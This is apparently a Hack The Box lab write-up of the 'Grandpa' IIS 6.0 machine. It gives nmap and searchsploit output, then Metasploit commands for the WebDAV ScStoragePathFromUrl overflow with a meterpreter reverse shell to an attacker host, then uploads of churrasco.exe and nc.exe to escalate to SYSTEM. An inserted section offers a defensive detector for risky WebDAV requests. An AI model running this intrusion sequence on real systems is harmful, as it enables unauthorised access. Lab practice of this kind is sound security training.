Grandpa — HTB

Vijay Singh Gurjar
Published in Armour Infosec
3 min read · Dec 16, 2019

MACHINE IP — 10.10.10.14

Nmap

# nmap -v -A -sC -oN nmap 10.10.10.14

PORT   STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-ntlm-info:
| Target_Name: GRANPA
| NetBIOS_Domain_Name: GRANPA
| NetBIOS_Computer_Name: GRANPA
| DNS_Domain_Name: granpa
| DNS_Computer_Name: granpa
|_ Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Server Type: Microsoft-IIS/6.0
| Server Date: Thu, 12 Dec 2019 11:06:13 GMT
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST,
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Then I used searchsploit for IIS 6.0 and found a remote buffer overflow vulnerability in Microsoft IIS httpd 6.0; you can also find this exploit through Google.

# searchsploit iis 6.0
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal I | exploits/windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Wind | exploits/windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Sta | exploits/windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Re | exploits/windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow | exploits/windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStorageP | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8806.pl
Microsoft IIS 6.0/7.5 (+ PHP) - Multip | exploits/windows/remote/19033.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
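From the defender's side, the two things worth alerting on are already visible in the scan and listing above: the WebDAV methods nmap flags as "potentially risky", and PROPFIND requests carrying the oversized If header that the public ScStoragePathFromUrl exploit (41738.py in the listing) uses to deliver its overflow. The following is an added example, not code from the post or from the exploit; the raw requests are constructed, and the 256-byte If-header threshold is an assumption for illustration.

```python
import re
from typing import Dict, List, Optional

# Methods nmap reported as "Potentially risky" on the IIS 6.0 box above.
RISKY_METHODS = {"TRACE", "COPY", "PROPFIND", "SEARCH", "LOCK", "UNLOCK",
                 "DELETE", "PUT", "MOVE", "MKCOL", "PROPPATCH"}

# Assumed threshold: legitimate WebDAV clients send short lock tokens in
# "If:", while the ScStoragePathFromUrl exploit sends a very long one.
MAX_IF_HEADER_LEN = 256


def parse_request(raw: str) -> Optional[Dict[str, str]]:
    """Parse a raw HTTP request head into method, target and lowercase headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    m = re.match(r"^([A-Z]+) (\S+) HTTP/1\.[01]$", lines[0])
    if not m:
        return None
    req = {"method": m.group(1), "target": m.group(2)}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            req[name.strip().lower()] = value.strip()
    return req


def classify(raw: str) -> List[str]:
    """Return the findings for one request; an empty list means nothing notable."""
    req = parse_request(raw)
    if req is None:
        return ["malformed request line"]
    findings = []
    if req["method"] in RISKY_METHODS:
        findings.append(f"risky WebDAV method {req['method']}")
    if req["method"] == "PROPFIND" and len(req.get("if", "")) > MAX_IF_HEADER_LEN:
        findings.append("oversized If header on PROPFIND (ScStoragePathFromUrl pattern)")
    return findings


# Constructed sample traffic (not captured from the box).
BENIGN_GET = "GET / HTTP/1.1\r\nHost: 10.10.10.14\r\n\r\n"
BENIGN_PROPFIND = ("PROPFIND /docs/ HTTP/1.1\r\nHost: 10.10.10.14\r\nDepth: 1\r\n"
                   "If: (<opaquelocktoken:example>)\r\n\r\n")
SUSPICIOUS_PROPFIND = ("PROPFIND / HTTP/1.1\r\nHost: 10.10.10.14\r\n"
                       "If: <http://10.10.10.14/" + "A" * 400 + ">\r\n\r\n")

if __name__ == "__main__":
    for name, raw in [("GET", BENIGN_GET), ("PROPFIND", BENIGN_PROPFIND),
                      ("PROPFIND-long-If", SUSPICIOUS_PROPFIND)]:
        print(name, classify(raw) or "ok")
```

The fix that makes both alerts moot is the one the scan points at: disable WebDAV on IIS 6.0 (or retire the host), so none of the risky methods are reachable at all.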

Then I ran msfconsole in the terminal and entered the following:

use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set rhost 10.10.10.14
set lhost 10.10.14.4
set payload windows/meterpreter/reverse_tcp
run
meterpreter > shell

We got the reverse shell; it looks like we are running as "NT AUTHORITY\NETWORK SERVICE".

Next we escalate privileges to SYSTEM; the way to do it here is token kidnapping.

Let’s upload the files from our local system to the target system:

upload /usr/share/sqlninja/apps/churrasco.exe
upload /usr/share/sqlninja/apps/nc.exe

Let’s move to the cmd shell.

And we got a SYSTEM shell.

We can now access the system without any restrictions.

THANK YOU.
